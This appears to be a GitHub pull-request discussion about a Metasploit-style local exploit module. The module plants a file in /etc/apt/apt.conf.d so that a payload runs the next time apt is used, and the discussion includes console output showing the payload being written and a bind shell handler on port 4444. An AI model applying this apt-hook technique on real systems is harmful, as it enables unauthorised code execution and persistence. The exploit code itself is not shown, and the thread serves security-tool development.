-rw-r--r-- 1 root root  108 Apr  2  2020 15update-stamp
-rw-r--r-- 1 root root  311 Apr  6  2023 20apt-esm-hook.conf
-rw-r--r-- 1 root root   85 Apr  2  2020 20archive
-rw-r--r-- 1 root root   80 Apr 13  2020 20auto-upgrades
-rw-r--r-- 1 root root 1040 Mar 12  2020 20packagekit
-rw-r--r-- 1 root root  127 Dec  1  2022 20snapd.conf
-rw-r--r-- 1 root root  625 Oct  7  2019 50command-not-found
-rw-r--r-- 1 root root 5459 Apr 13  2020 50unattended-upgrades
-rw-r--r-- 1 root root  182 Aug  3  2019 70debconf
-rw-r--r-- 1 root root  305 Apr  2  2020 99update-notifier
-rwxrwxrwx 1 root root    0 Jul  6 13:32 lock
[+] Successfully created /etc/apt/apt.conf.d/lock
[*] Writing '/home/ubuntu/IwpOoeqZgXX' (198 bytes) ...
[+] The next time apt-get is used to update, upgrade or install your payload will be triggered. Cheers ;)
[*] Started bind TCP handler against :4444
[*] Exploit completed, but no session was created.

Testing system is the same as that mentioned above, however the exploit appears to be unreliable and as such I have down graded the reliability of the module. When testing the exploit manually I was successful, however I tried to test the module it did not work, similar to the issue you described above.

I rebooted the system, reset the symbol links and ran the module without testing and got the module to work as shown in the output above. I am going to do some more testing tomorrow, could you try to run the module without testing manually on a fresh system? I believe that when running the exploit consecutively either through a module or manually some of the crash contents are dumped into the directories, as denoted by the segmentation fault in the directories entries. I can't tell what exactly is occurring but this mucks things up.

I know that this pull request has been open for quiet some time, I would like it to go through but if your team does not think the efforts are worth it because the exploit is to unreliable then I understand. Thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

module needs-docs needs-linting The module needs additional work to pass our automated linting rules

Projects

Status: Waiting on Contributor

Development

Successfully merging this pull request may close these issues.

7 participants